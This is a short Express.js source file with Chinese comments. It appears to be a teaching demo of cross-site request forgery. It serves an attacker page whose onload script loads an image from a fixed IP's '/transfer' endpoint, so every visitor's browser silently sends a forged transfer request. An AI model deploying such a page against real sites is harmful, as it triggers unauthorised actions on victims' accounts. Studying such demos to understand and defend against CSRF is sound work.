const express = require('express');
const app = express();
const port = 3000;


// 恶意页面，包含诱导请求，这里是黑客给用户返回了一个恶意构造的页面，用户只要访问这个页面，就会自动发送请求到目标网站的转账接口
app.get('/hacker', (req, res) => {
    console.log('有用户请求了黑客的恶意页面');

    const html = `
        <html lang="en">
        <body>
            <h1>欢迎来到黑客的网站，我要偷偷发起转账请求!</h1>
            <script>
                window.onload = function() {
                    // 自动发送请求到目标网站的转账接口, 因为浏览器会自动加载图片，从而触发请求
                    const img = new Image();
                    img.src = 'http://47.119.136.72:3000/transfer';
                };
            </script>
        </body>
        </html>
    `;
    res.send(html);
});

app.listen(port, () => {
    console.log(`黑客的服务器运行在端口号 ${port} 上`);
});